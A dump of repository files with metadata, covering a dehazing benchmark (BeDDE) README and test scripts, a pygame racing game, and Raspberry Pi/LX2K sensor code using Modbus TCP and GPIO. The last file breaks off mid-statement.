& Torchvision v0.2.0\n\n## Testing on sample images\n1. Download the [pretrained model](https://github.com/hezhangsprinter/DCPDN#demo-using-pre-trained-model) from the original author. Place the model in `./demo_model`\n\n2. Generate .h5 files for test images by \n\n`python generate_testsample.py`\n\nIf it successes, there should be .h5 files in the folder `demo_image`.\n\n3. Test sample images by\n\n```python demo.py --valDataroot ./demo_image --netG ./demo_model/netG_epoch_8.pth```\n\nAfterwards, the restored images will be saved in the folder `demo_image`\n\n## References\nOriginal implementation: https://github.com/hezhangsprinter/DCPDN\n" }, { "alpha_fraction": 0.572257399559021, "alphanum_fraction": 0.597046434879303, "avg_line_length": 28.625, "blob_id": "f09052ebf42b830fa989463dfd24ffb25ca698fe", "content_id": "696471ff1e5cd2e07c4ae3f6d0eb15353f337fe5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1896, "license_type": "no_license", "max_line_length": 88, "num_lines": 64, "path": "/DCPDN/generate_BeDDE.py", "repo_name": "haipnh/BeDDE-for-defogging", "src_encoding": "UTF-8", "text": "#coding=utf-8\nfrom __future__ import division\n\nimport sys\nsys.path.append(\"./mingqingscript\")\n\nimport os\nimport glob\nimport h5py\n\nimport numpy as np\nfrom scipy import misc\n\n\ndef array2PIL(arr, size):\n mode = 'RGBA'\n arr = arr.reshape(arr.shape[0]*arr.shape[1], arr.shape[2])\n if len(arr[0]) == 3:\n arr = np.c_[arr, 255*numpy.ones((len(arr),1), numpy.uint8)]\n return Image.frombuffer(mode, size, arr.tostring(), 'raw', mode, 0, 1)\n\n# ------------------\ntest_image_root = '../my_testset/resized'\nsave_root = '../my_testset/for_DCPDN'\n\nsave_size = 1024 # 512 is default\n# ------------------\n\ncityFolderNames = list()\nallRootFiles = os.listdir(test_image_root)\n\nfor folderName in allRootFiles:\n if '.' != folderName and '..' != folderName and ('.' not in folderName):\n cityFolderNames.append(folderName)\n\n for cityName in cityFolderNames:\n curImgFolder = os.path.join(test_image_root, cityName, 'fog')\n curSaveFolder = os.path.join(save_root, cityName, 'fog')\n if not os.path.exists(curSaveFolder):\n os.makedirs(curSaveFolder, mode=0o777)\n\n curImageNames = glob.glob(os.path.join(curImgFolder,'*.png'))\n\n for imgName in curImageNames:\n print('process %s'%imgName)\n img = misc.imread(imgName)\n\n img_rs = misc.imresize(img, (save_size,save_size), 'bilinear').astype(float)\n haze_image=img_rs\n # gt_img=img_rs\n\n # img = img/255\n\n haze_image=haze_image/255\n # gt_img=gt_img/255\n\n prefix = imgName.split('/')[-1][:-4]\n saveFilePath = os.path.join(curSaveFolder, prefix+'.h5')\n h5f=h5py.File( saveFilePath,'w')\n\n h5f.create_dataset('haze',data=haze_image)\n h5f.create_dataset('trans',data=0)\n h5f.create_dataset('ato',data=0)\n h5f.create_dataset('gt',data=0)\n" }, { "alpha_fraction": 0.7145363688468933, "alphanum_fraction": 0.732622504234314, "avg_line_length": 61.32478713989258, "blob_id": "9538cb4f8a1e05c5fb8ec629f30b637224d24171", "content_id": "03556f196c913749985b1af55188158dd436c368", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7532, "license_type": "no_license", "max_line_length": 1041, "num_lines": 117, "path": "/README.md", "repo_name": "haipnh/BeDDE-for-defogging", "src_encoding": "UTF-8", "text": "# BeDDE & exBeDDE for dehazing evaluation\r\n## BeDDE\r\n|<img src=\"https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/chengdu_clear_rs.jpg\" width=\"\"/>|<img src=\"https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/chengdu_3_rs.jpg\" width=\"\"/>|<img src=\"https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/chengdu_2_rs.jpg\" width=\"\"/>|<img src=\"https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/chengdu_6_rs.jpg\" width=\"\"/>|<img src=\"https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/chengdu_21_rs.jpg\" width=\"\"/>|\r\n|:---:|:---:|:---:|:---:|:---:|\r\n|Reference image|Light|Light|Medium|Heavy|\r\n\r\nBeDDE (read as /ˈbedi/) is a real-world benchmark dataset for evaluations of dehazing methods.\r\nIt consists of 208 pairs of hazy images and clear refernece images. \r\nFor each pair, a manually labelled mask is provided to delineate regions with the same contents.\r\nWe evaluate dehazing results on those regions.\r\n\r\n## exBeDDE\r\nexBeDDE is an extension of BeDDE, designed to **measure the performance of dehazing evaluation metrics**. It contains 167 hazy images and 1670 dehazed images with mean opinion scores labeled by people. Its hazy images come from BeDDE, and the dehazed images are generated by 10 dehazing methods.\r\n\r\n## Visibility Index (VI) and Realness Index (RI)\r\nWe find it is more reasonable to evaluate dehazed reuslts from two separate aspects, i.e., visibility and realness, and acorrdingly propose two criteria, i.e., visibility index (VI) and realness index (RI). More details can be found in the [paper](https://ieeexplore.ieee.org/document/9099036) (or [this link](https://sse.tongji.edu.cn/linzhang/files/TIP-BeDDE.pdf)) titled as _Dehazing Evaluation: Real-World Benchmark Datasets, New Criteria and Baselines_. (Presented in Trans. Image Process.)\r\n\r\n# Download\r\nYou can download [BeDDE](https://drive.google.com/file/d/12p-MY2ZygT5Tl8q0oFxDIUg9B5Jn042-/view?usp=sharing) and [exBeDDE](https://drive.google.com/file/d/1swAyQS-j9QNTvLwsCJgbFXnjscB86CeL/view?usp=sharing) on Google drive.\r\n\r\nYou may also get access to [the two datasets](https://pan.baidu.com/s/1lUVtdhyrvFBwl8tmwxqUXg) (key: m53p) on BaiduYun disk.\r\n\r\n# Testing\r\n## Our environment\r\n- Matlab 2017b\r\n\r\n## Test on BeDDE\r\n1. Download BeDDE.rar and unzip it to `./Defogging_eval`\r\n\r\n2. Set Matlab work folder to `./Defogging_eval`\r\n\r\n3. Run `eval_defog_method.m`\r\n\r\nThen, you will see the VI score of hazy images. You may modify the variables to try other dehazing methods or metrics. \r\nMoreover, the score for each image will be stored in `./statistics/<your_method_name>_<metric>_eval.mat`.\r\n\r\n4. Run `eval_defog_method_stat_by_level.m` to get evaluations on level. \r\n\r\nThis script requires the stored scores generated in last step, but you may use the example scores for [RefineDNet](https://github.com/xiaofeng94/RefineDNet-for-dehazing). For your case, you should modify variables `method_names` and `metric_name`. \r\n\r\nThe difficulty levels are stored in `./fog_level_labels/fog_level.mat`.\r\n\r\n## Test on exBeDDE\r\n1. Download exBeDDE.rar and unzip it to `./Defogging_eval`\r\n\r\n2. Set Matlab work folder to `./Defogging_eval`\r\n\r\n3. Run `assess_IQA_metric.m`\r\n\r\nIt will take a while. After that, you will see the performance of our VI on hazy groups. You may modify the variables to test on dehazed groups or assess other metrics.\r\n\r\n## Test your own dehazing method on BeDDE\r\n1. Create a folder named after your method in each city folder of BeDDE. Put the images results of each city to the corresponding folder you just created. Name all the dehazed images after their original hazy images or make sure the name of a dehazed image starts with the name of its original hazy image. Your directory tree may look like, \r\n```\r\nBeDDE\r\n├── beijing\r\n│ ├── fog\r\n│ │ ├── beijing_1.png\r\n│ │ ├── beijing_2.png\r\n│ │ ...\r\n│ │ └── beijing_15.png\r\n│ ├── gt\r\n│ ├── mask\r\n│ ├── <your_method_name>\r\n│ │ ├── beijing_1_<your_method_name>.png\r\n│ │ ├── beijing_2_<your_method_name>.png\r\n│ │ ...\r\n│ │ └── beijing_15_<your_method_name>.png\r\n├── changsha\r\n│ ...\r\n├── chengdu\r\n│ ...\r\n...\r\n```\r\n\r\n2. Set the variable `method_name` in `eval_defog_method.m` to the name of your method.\r\n\r\n3. Set the variable `eval_method` to `VI`, `RI`, `VSI` or other metrics and then run the script to get the score for your method on BeDDE.\r\n\r\n# Benchmarks\r\n## Dehazing methods\r\nAll methods were evaluated on BeDDE. VI shows their abilities to restore visibility, RI and LPIPS refer to realness of the results.\r\n![dehazing benchmarks](https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/dehazing_bm.jpg)\r\n\r\n## Dehazing metrics\r\nAll metrics were assessed on exBeDDE's hazy groups for the visibility evaluation and on dehazing groups for the realness evaluation.\r\n|Visibility evaluation|Realness evaluation|\r\n|:---:|:---:|\r\n|<img src=\"https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/metric_bm_vi.jpg\" width=\"300\"/>|<img src=\"https://github.com/xiaofeng94/BeDDE-for-defogging/blob/master/Defogging_eval/figures/metric_bm_ri.jpg\" width=\"300\"/>|\r\n\r\n# Dehazing methods\r\nThe selected 14 dehazing methods adopted by exBeDDE are \r\nFast Visibility Restoration (FVR), \r\nDark Channel Prior (DCP), \r\nBayesian Defogging (BayD), \r\nColor Attenuation Prior (CAP), \r\nNon-Local image Dehazing (NLD), \r\nMSCNN, \r\nDehazeNet, \r\nAOD-Net, \r\nDCPDN, \r\nGFN, \r\nDisentGAN,\r\nLearning a patch quality comparator (PQC), \r\nEPDN,\r\nand GridDehazeNet.\r\n\r\nWe used offical code for all dehazing methods (except DCP). Please try the code link for those methods listed as follows: [FVR](http://perso.lcpc.fr/tarel.jean-philippe/visibility/) (Bottom), [DCP](https://github.com/sjtrny/Dark-Channel-Haze-Removal), <!--[BayD](https://www.cs.drexel.edu/~kon/codeanddata/defog/),--> [CAP](https://github.com/JiamingMai/Color-Attenuation-Prior-Dehazing), [NLD](https://github.com/danaberman/non-local-dehazing), [MSCNN](https://github.com/rwenqi/Multi-scale-CNN-Dehazing), [DehazeNet](https://github.com/caibolun/DehazeNet), [AOD-Net](https://github.com/Boyiliee/AOD-Net), [DCPDN](https://github.com/hezhangsprinter/DCPDN) (Also try [this code](https://github.com/xiaofeng94/BeDDE-for-defogging/tree/master/DCPDN) with less issues to fix), [GFN](https://github.com/rwenqi/GFN-dehazing), [DisentGAN](https://github.com/xyang35/Disentangled-GAN), [PQC](https://github.com/san-santra/dehaze_t_comparator), [EPDN](https://github.com/ErinChen1/EPDN), [GridDehazeNet](https://github.com/proteus1991/GridDehazeNet)\r\n\r\n<!--Code of those methods used in our experiments is available upon email requests. If one is frequently required, we will release it here as well. Current released methods: [DCPDN](https://github.com/xiaofeng94/BeDDE-for-defogging/tree/master/DCPDN)-->\r\n\r\n# References\r\nIf our datasets and criteria are helpful, please consider citing the following papers. [1] and [2] for BeDDE. [2] for exBeDDE, VI, and RI.\r\n\r\n[1] S. Zhao, L. Zhang, _et al._ Evaluation of defogging: A real-world benchmark dataset, a new criterion and baselines. In _ICME_, pp.1840-1845, 2019.\r\n\r\n[2] S. Zhao, L. Zhang, _et al._ Dehazing Evaluation: Real-world Benchmark Datasets, Criteria and Baselines. _IEEE Trans. Image Process._, 28(1):6947-6962, 2020.\r\n" }, { "alpha_fraction": 0.6037117838859558, "alphanum_fraction": 0.6226346492767334, "avg_line_length": 25.689319610595703, "blob_id": "189f6123733a931f31f795f1a12bc108e9a29cd9", "content_id": "8597fcae4aafbc1e7ea047414ab112a19cc7b421", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2748, "license_type": "no_license", "max_line_length": 115, "num_lines": 103, "path": "/DCPDN/test_BeDDE.py", "repo_name": "haipnh/BeDDE-for-defogging", "src_encoding": "UTF-8", "text": "import os\nimport random\nimport time\n\nimport torch\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\n\nfrom misc import *\nimport dehaze22 as net\n\n# ----------------------\ntest_image_root = '../my_testset/for_DCPDN'\nsave_root = '../my_testset/results_temp'\n\nmethod_name = 'DCPDN'\nuseGPU = True\nimageSize = 1024\n# ----------------------\n\n\ndataset_type = 'pix2pix_val'\n\n\nvalBatchSize = 1\nworkerNum = 1\nmanualSeed = random.randint(1, 10000)\n\nngf = 64\nndf = 64\ninputChannelSize = 3\noutputChannelSize= 3\n\nnetG = net.dehaze(inputChannelSize, outputChannelSize, ngf)\n\nmodel_file = './demo_model/netG_epoch_8.pth'\nnetG.load_state_dict(torch.load(model_file))\nprint(netG)\n\nnetG.train()\nif useGPU:\n netG.cuda()\n\ninputHolder = torch.FloatTensor(valBatchSize, inputChannelSize, imageSize, imageSize)\nif useGPU:\n inputData = Variable(inputHolder.cuda(),volatile=True)\nelse:\n inputData = Variable(inputHolder,volatile=True)\n\ncityFolderNames = list()\nallRootFiles = os.listdir(test_image_root)\n\nfor folderName in allRootFiles:\n if '.' != folderName and '..' != folderName and ('.' not in folderName):\n cityFolderNames.append(folderName)\n\ntotalTime = 0\ntotalImgCount = 0\nfor cityName in cityFolderNames:\n valDataroot = os.path.join(test_image_root, cityName, 'fog')\n\n valDataloader = getLoader(dataset_type,\n valDataroot,\n imageSize, # not used\n imageSize, # not used\n valBatchSize,\n workerNum,\n mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5),\n split='Train',\n shuffle=False,\n seed=manualSeed)\n\n curSaveFolder = os.path.join(save_root, cityName, method_name)\n if not os.path.exists(curSaveFolder):\n os.makedirs(curSaveFolder, mode=0o777)\n\n print('----- %s'%cityName)\n for i, data in enumerate(valDataloader):\n input_cpu, _, __, ___, file_name = data\n\n if useGPU:\n input_cpu = input_cpu.float().cuda()\n else:\n input_cpu = input_cpu.float()\n # get paired data\n inputData.data.resize_as_(input_cpu).copy_(input_cpu)\n\n t0 = time.time()\n x_hat, tran_hat, atp_hat, dehaze2= netG(inputData)\n elapsedT = time.time() - t0\n totalTime = totalTime + elapsedT\n print('elapsed time: %f'%elapsedT)\n totalImgCount = totalImgCount + 1\n\n zz=x_hat.data\n \n zz1=zz[0,:,:,:]\n vutils.save_image(zz1, os.path.join(curSaveFolder, '%s_%s.png'%(file_name[0].split('/')[-1][:-3],method_name)),\n normalize=True, scale_each=False)\n\nprint('total time: %.4f'%totalTime)\nprint('total count: %d'%totalImgCount)\nprint('average time: %.4f'%(totalTime/totalImgCount))" } ]
5
Finse/Race-To-The-End-Python
https://github.com/Finse/Race-To-The-End-Python
fc39af8a7bdc0c67fd57a65c23bfcb13c916bef4
24c3c57b9021be360abab112ad596c0484cfb68d
8b6b39a409cd3f8077459927759909d435d55196
refs/heads/master
2022-12-10T15:22:11.050454
2020-09-04T02:44:46
2020-09-04T02:44:46
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7510204315185547, "alphanum_fraction": 0.7632653117179871, "avg_line_length": 34, "blob_id": "3a6f3ccd9bbb70569cab5b0b489fb00891f76369", "content_id": "a06a0889815cd24471dc2003457cdf1181683d79", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 245, "license_type": "no_license", "max_line_length": 55, "num_lines": 7, "path": "/README.md", "repo_name": "Finse/Race-To-The-End-Python", "src_encoding": "UTF-8", "text": "# Race-To-The-End-Python\n\nRace to the end is a simple 2d racing game where\nyou have to avoid stop signs and collect coins.\nYou have 3 lives to do that and you get 1 point per\nstop sign dogged.It is also my first python game and it\nUse's pygame.\n" }, { "alpha_fraction": 0.5431309938430786, "alphanum_fraction": 0.6273162961006165, "avg_line_length": 16.106557846069336, "blob_id": "717e200ad1855ea73967a5860875be3d3e69c6d3", "content_id": "7a8f47020eac78e1993d31f76c2166d7da65e26e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6260, "license_type": "no_license", "max_line_length": 83, "num_lines": 366, "path": "/Race To End/Race To The End.py.py", "repo_name": "Finse/Race-To-The-End-Python", "src_encoding": "UTF-8", "text": "import pygame\nimport time\nimport random\nimport math\n\npygame.init()\n\nwin_width = 900\nwin_height = 600\n\nGameIcon = pygame.image.load('game icon.png')\n\nBg = pygame.image.load('game bg.png')\n\nCarImage = pygame.image.load('racing-car.png')\n\nStopImage = pygame.image.load('stop.png')\n\n\ncrashS = pygame.mixer.Sound(\"crash.wav\")\n\ncoins = pygame.image.load('dollar.png')\n\n\n\nwin = pygame.display.set_mode((win_width, win_height))\n\npygame.display.set_caption('Race To End')\n\npygame.display.set_icon(GameIcon)\n\n\nx = 380\ny = 530\nwidth = 64\nheight = 64\nvel = 2.8\nlives = 3\nscore = 0\ncrashstate = False\nrun = False\ncoinC = 0\nhighscore = 0\n\n\n\nstopvel = 6\nstopX2 = random.randint(10, 300)\nstopX = random.randint(350, 800)\nstopY = 35\n\ncoiny = 35\ncoinx = random.randint(10, 800)\n\ndef crash(count):\n\tglobal scorex\n\tglobal scorey\n\tglobal scoreSize\n\tglobal run\n\tglobal menu\n\tglobal startMenu\n\tglobal stopvel\n\tglobal lives\n\tglobal stopvel\n\tglobal score\n\tglobal highscore\n\tglobal HSM\n\tglobal fileH\n\tglobal coinC\n\tglobal fileH\n\tglobal hsr\n\n\n\tstopvel = 0\n\n\tstopX2 = random.randint(10, 300)\n\ttopX = random.randint(350, 800)\n\n\tlives -= 1\n\n\n\n\n\tmouseP = pygame.mouse.get_pos()\n\tmouseC = pygame.mouse.get_pressed()\n\n\tstopvel == 0 \n\n\tif 750 + 80 > mouseP[0] > 750 and 480 + 50 > mouseP[1] > 480:\n\t\tif mouseC[0] == 1:\n\t\t\trun = False\n\n\t\t\thighscore += score\n\n\tif 350 + 80 > mouseP[0] > 350 and 480 + 50 > mouseP[1] > 480:\n\t\tif mouseC[0] == 1:\n\n\t\t\thighscore += score\n\n\n\t\t\tlives = 3\n\t\t\tstopvel = 4\n\t\t\tscore = 0\n\t\t\tnice = True\n\n\n\n\tscorex = 330\n\tscorey = 400\n\tscoreSize = 45\n\n\tcrashstate = True\n\n\tfont = pygame.font.SysFont(\"comicsansms\", 100)\n\tsFont = pygame.font.SysFont(\"comicsansms\", 25)\n\n\ttextb3 = sFont.render(\"Play\", True, (0,0,0))\n\ttextB2 = sFont.render(\"Quit\", True, (0,0,0))\n\n\n\tcrasht = font.render(\"You Crashed\", True, (0, 0, 0))\n\tpygame.draw.rect(win, (255, 255, 255), (0, 0, win_width, win_height))\n\n\tpygame.draw.rect(win, (0 , 255, 0), (350, 480, 80, 50))\n\n\n\tfont = pygame.font.SysFont(\"comicsansms\", 45)\n\ttext = font.render(\"score: \"+str(count), True, (0, 0, 255))\n\twin.blit(text,(400, 350))\n\twin.blit(crasht,(230, 120))\n\twin.blit(textb3, (355, 480))\n\n\tpygame.draw.rect(win, (255, 0, 0), (750, 480, 80, 50))\n\twin.blit(textB2, (750, 480))\n\t\t\n\tpygame.display.update()\n\n\n \ndef isCollision():\n\tglobal lives\n\tglobal x\n\tglobal stopY\n\tglobal stopX\n\tglobal stopX2\n\n\n\n\n\n\tif y < stopY + 128:\n\t \tprint(\"y crossover\")\n\t \tif x > stopX and x < stopX + 128 or x + 64 > stopX and x + 64 < stopX + 128:\n\t \t\tprint(\"x crossover\")\n\t \t\tlives -= 1\n\t \t\tstopY = 35\n\t \t\tstopX2 = random.randint(10, 800)\n\t \t\tstopX = random.randint(10, 800)\n\n\t \tif x > stopX2 and x < stopX2 + 128 or x + 64 > stopX2 and x + 64 < stopX2 + 128:\n\t \t\tprint(\"x crossover\")\n\t \t\tlives -= 1\n\t \t\tstopY = 35\n\t \t\tstopX2 = random.randint(10, 800)\n\t \t\tstopX = random.randint(10, 800)\n\n\ndef isCollisionCoin():\n\tglobal y\n\tglobal x\n\tglobal coinx\n\tglobal coiny\n\tglobal coinC\n\tglobal C\n\tglobal CM\n\tglobal fileC\n\tglobal coinC\n\n\n\n\n\tif y < coiny + 128:\n\t \tprint(\"y crossover\")\n\t \tif x > coinx and x < coinx + 128 or x + 64 > coinx and x + 64 < coinx + 128:\n\t \t\tprint(\"x crossover\")\n\t \t\tcoinC += 1\n\t \t\tcoiny = 35\n\t \t\tcoinx = random.randint(10, 800)\n\n\ndef livescount(count):\n\tfont = pygame.font.SysFont(\"comicsansms\", 20)\n\ttext = font.render(\"Lives: \"+str(count), True, (255, 0, 0))\n\twin.blit(text,(5, 3))\n\ndef scorecount(count):\n\tfont = pygame.font.SysFont(\"comicsansms\", 20)\n\ttext = font.render(\"Score: \"+str(count), True, (0, 0, 255))\n\twin.blit(text,(4, 21))\n\ndef coincount(count):\n\tglobal coinC\n\tfont = pygame.font.SysFont(\"comicsansms\", 20)\n\ttext = font.render(\"Coins: \"+ str(coinC), True, (255,255,0))\n\twin.blit(text,(4, 40))\n\ndef hscorecount():\n\tglobal highscore\n\tglobal HSM\n\tglobal hsr\n\tfont = pygame.font.SysFont(\"comicsansms\", 20)\n\ttext = font.render(\"HighScore: \"+ str(highscore) + \" \", True, (0,255,0))\n\twin.blit(text,(4, 63))\n\n\n\ndef startMenu():\n\tglobal run\n\n\tmenu = True\n\twhile menu:\n\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tquit()\n\n\t\tmouseP = pygame.mouse.get_pos()\n\t\tmouseC = pygame.mouse.get_pressed()\n\n\t\tif 150 + 80 > mouseP[0] > 150 and 480 + 50 > mouseP[1] > 480:\n\t\t\tif mouseC[0] == 1:\n\t\t\t\tmenu = False\n\t\t\t\trun = True\n\n\n\t\tif 750 + 80 > mouseP[0] > 750 and 480 + 50 > mouseP[1] > 480:\n\t\t\tif mouseC[0] == 1:\n\t\t\t\tmenu = False\n\n \n\n\t\t\t\n\t\twin.fill((250, 250,250))\n\n\t\tsFont = pygame.font.SysFont(\"comicsansms\", 25)\n\t\tfont = pygame.font.SysFont(\"comicsansms\", 100)\n\t\ttext = font.render(\"Race To The \", True, (0,185,255))\n\t\ttext1 = font.render(\" End\", True, (0,185,255))\n\t\ttextB1 = sFont.render(\"Start\", True, (0,0,0))\n\t\ttextB2 = sFont.render(\"Quit\", True, (0,0,0))\n\t\ttextB3 = sFont.render(\"Shop\", True, (0,0,0))\n\t\ttextby = sFont.render(\"by Gurman\", True, (150, 255, 0))\n\n\n\t\tpygame.draw.rect(win, (0, 255, 0), (150, 480, 80, 50))\n\t\tpygame.draw.rect(win, (255, 0, 0), (750, 480, 80, 50))\n\n\n\t\twin.blit(text,(200, 50))\n\t\twin.blit(text1, (250, 150)) \n\t\twin.blit(textB1, (153, 480))\n\t\twin.blit(textB2, (753, 480))\n\t\twin.blit(textby, (450, 560))\n\t\tpygame.display.update()\n\t\t\nrun = False\n\nstartMenu()\nwhile run:\n\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\trun = False\n\n\tkeys = pygame.key.get_pressed()\n\tif keys[pygame.K_LEFT]:\n\t\tx -= vel\n\n\tif keys[pygame.K_RIGHT]:\n\t\tx += vel\n\n\tif x >= win_width - 50 :\n\t\tx -= vel\n\n\tif x <= -1:\n\t\tx += vel\n\n\tif stopX == stopX2:\n\t\tstopX2 += 138\n\n\tif stopX == stopX2:\n\t\tstopX2 -= 138\n\n\tstopY += stopvel\n\n\n\tif stopY >= win_height - 64:\n\t\tstopY = 35\n\t\tstopX2 = random.randint(10, 300)\n\t\tstopX = random.randint(350, 800)\n\n\n\tisCollision()\n\tisCollisionCoin()\n\n\n\n\twin.blit(Bg, (0, 0))\n\twin.blit(CarImage, (x, y))\n\twin.blit(coins, (coinx, coiny))\n\n\twin.blit(StopImage, (stopX, stopY))\n\twin.blit(StopImage, (stopX2, stopY))\n\n\n\tlivescount(lives)\n\n\tscorecount(score)\n\n\tcoincount(coinC)\n\n\thscorecount()\n\n\n\n\tif y <= stopY and not x == stopX:\n\t\tscore += 1\n\n\tif lives == 0:\n\t\tcrash(score)\n\t\tpygame.mixer.Sound.play(crashS)\n\n\tif lives <= 0:\n\t\tcrash(score)\n\n\tcoiny += 4\n\n\tif coiny >= win_height :\n\t\tcoiny = 35\n\t\tcoinx = random.randint(10, 800)\n\n\n\tif score == 4:\n\t\tstopvel = 7\n\n\tif score == 10 :\n\t\tstopvel = 8\n\n\tif score == 16 :\n\t\tstopvel = 9\n\n\tif score == 25:\n\t\tstopvel = 10\n\n\n\tif score == 50:\n\t\tstopvel = 13\n\n\n\n\n\n\tpygame.display.update()\n\n\npygame.quit()" } ]
2
kaidegit/2021-emb
https://github.com/kaidegit/2021-emb
6e95210c98f3399b063e027879005670e7b5ad38
892e9dd6e0944113298fcf86d7084c8eb4359977
4d2eb27e694bd0382f2a1ef940e6eff46b399e92
refs/heads/main
2023-08-30T07:11:41.446768
2021-11-14T07:24:43
2021-11-14T07:24:43
405,392,044
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.565517246723175, "alphanum_fraction": 0.565517246723175, "avg_line_length": 18.33333396911621, "blob_id": "24c00e1a96cf9be0796bacb1851e7bec683c3713", "content_id": "afa2363be7bed0d2e1c449218f58357c5249b418", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 354, "license_type": "no_license", "max_line_length": 43, "num_lines": 15, "path": "/lx2k/serverChan.py", "repo_name": "kaidegit/2021-emb", "src_encoding": "UTF-8", "text": "import requests\n\n\ndef sendMsg(title, desp):\n # url根据server酱生成的地址写\n url = 'http://sctapi.ftqq.com/.send'\n data = {\n 'title': title,\n 'desp': desp\n }\n res = requests.post(url=url, data=data)\n\n\nif __name__ == '__main__':\n sendMsg(\"警告:有人跌倒了\", \"您家老人似乎跌倒了,请及时处理\")\n" }, { "alpha_fraction": 0.6187499761581421, "alphanum_fraction": 0.6556817889213562, "avg_line_length": 26.076923370361328, "blob_id": "f2809db89619c4e06cdc51b487a40f4801d41170", "content_id": "6512ba9f8f5e9d6c47dcac8bb9a02859aa507c02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1760, "license_type": "no_license", "max_line_length": 81, "num_lines": 65, "path": "/lx2k/main.py", "repo_name": "kaidegit/2021-emb", "src_encoding": "UTF-8", "text": "import time\n\nimport modbus_tk\nimport modbus_tk.hooks as hooks\nimport modbus_tk.defines as cst\nimport modbus_tk.modbus as modbus\nimport modbus_tk.modbus_tcp as modbus_tcp\nimport logging\n\nfrom gpio import *\nfrom serverChan import *\n\nlogger = modbus_tk.utils.create_logger(\"console\", level=logging.DEBUG)\n\n\ndef on_after_recv(data):\n master, bytes_data = data\n# logger.info(bytes_data)\n\n\nhooks.install_hook('modbus.Master.after_recv', on_after_recv)\n\n\ndef on_before_connect(args):\n master = args[0]\n# logger.debug(\"on_before_connect {0} {1}\".format(master._host, master._port))\n\n\nhooks.install_hook(\"modbus_tcp.TcpMaster.before_connect\", on_before_connect)\n\n\ndef on_after_recv(args):\n response = args[1]\n# logger.debug(\"on_after_recv {0} bytes received\".format(len(response)))\n\n\nhooks.install_hook(\"modbus_tcp.TcpMaster.after_recv\", on_after_recv)\n\nmaster = modbus_tcp.TcpMaster(host=\"192.168.0.108\")\nmaster.set_timeout(5.0)\n#logger.info(\"connected\")\nwhile True:\n temp = master.execute(1, cst.READ_INPUT_REGISTERS, 185, 1)[0] / 10\n humi = master.execute(1, cst.READ_INPUT_REGISTERS, 186, 1)[0] / 10\n light = master.execute(1, cst.READ_INPUT_REGISTERS, 187, 1)[0]\n air = master.execute(1, cst.READ_INPUT_REGISTERS, 188, 1)[0]\n light_state = False\n if light < 700:\n set_gpio(60)\n set_gpio(61)\n set_gpio(62)\n set_gpio(63)\n if light_state:\n sendMsg(\"light is off\")\n light_state = True\n else:\n reset_gpio(60)\n reset_gpio(61)\n reset_gpio(62)\n reset_gpio(63)\n if not light_state:\n sendMsg(\"light is off\")\n light_state = False\n print(f\"temperature:{temp}\\thumity:{humi}\\tlight:{light}\\tair:{air}\")\n time.sleep(1)\n" }, { "alpha_fraction": 0.4916888177394867, "alphanum_fraction": 0.5821143388748169, "avg_line_length": 28.213592529296875, "blob_id": "9d999ba84dea56770006325f146ccd7e0af7b471", "content_id": "668425764d74a6d69977faa9281aa797128221ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3354, "license_type": "no_license", "max_line_length": 83, "num_lines": 103, "path": "/rpi/main.py", "repo_name": "kaidegit/2021-emb", "src_encoding": "UTF-8", "text": "import modbus_tk\nimport modbus_tk.defines as cst\nimport modbus_tk.modbus as modbus\nimport modbus_tk.modbus_tcp as modbus_tcp\nimport logging\nimport time\nimport smbus\nimport RPi.GPIO as GPIO\nimport max30102\n\n# 配置树莓派的GPIO 空污传感器接在BCM24/23上\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(23, GPIO.IN)\nGPIO.setup(24, GPIO.IN)\n\n# 新建一个i2c对象\nbus = smbus.SMBus(1)\n\n# 创建一个MODBUS-TCP对象并开启服务\nlogger = modbus_tk.utils.create_logger(name=\"console\", record_format=\"%(message)s\")\nserver = modbus_tcp.TcpServer(address=\"192.168.0.108\", port=502)\nserver.start()\n\n# 添加一个slaver,给这个slaver添加温度、湿度、光照、空气质量的block(Niagara中称为Point)\nslaver = server.add_slave(1)\nslaver.add_block('Temperature', cst.READ_INPUT_REGISTERS, 185, 1)\nslaver.add_block('Humidity', cst.READ_INPUT_REGISTERS, 186, 1)\nslaver.add_block('Light', cst.READ_INPUT_REGISTERS, 187, 1)\nslaver.add_block('Air', cst.READ_INPUT_REGISTERS, 188, 1)\n\n# 开启光照传感器\nbus.write_i2c_block_data(0x39, 0x80, [0x03])\n\nwhile True:\n # 读取计算SHT30传感器的温湿度\n bus.write_i2c_block_data(0x44, 0x2C, [0x06])\n time.sleep(0.5)\n data = bus.read_i2c_block_data(0x44, 0x00, 6)\n # print(data)\n temp = data[0] * 256 + data[1]\n temp = -45 + (175 * temp / 65535.0)\n temp = int(temp * 10)\n humi = 100 * (data[3] * 256 + data[4]) / 65535.0\n humi = int(humi * 10)\n # 更新温度和湿度寄存器的值\n slaver.set_values('Temperature', 185, temp)\n slaver.set_values(\"Humidity\", 186, humi)\n # print(f\"temperature:{temp / 10}\")\n # print(f\"humidity:{humi / 10}\")\n\n # 读取光照传感器的值\n data0_low = bus.read_i2c_block_data(0x39, 0x8c, 1)\n data0_high = 